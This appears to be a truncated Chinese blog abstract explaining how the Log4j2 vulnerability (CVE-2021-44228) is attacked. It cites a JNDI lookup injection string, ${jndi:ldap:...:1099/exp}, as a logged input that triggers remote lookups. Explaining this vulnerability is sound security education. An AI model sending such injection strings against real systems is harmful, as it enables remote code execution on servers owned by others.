whoam1

摘要： Log4j2（CVE-2021-44228） 漏洞攻击原理 原理概述 当用户输入信息时，应用程序中的log4j2组件会将信息记录到日志中 假如日志中含有该语句${jndi:ldap:192.168.96.1:1099/exp}，log4j就会去解析该信息，通过jndi的lookup()方法去解析该U 阅读全文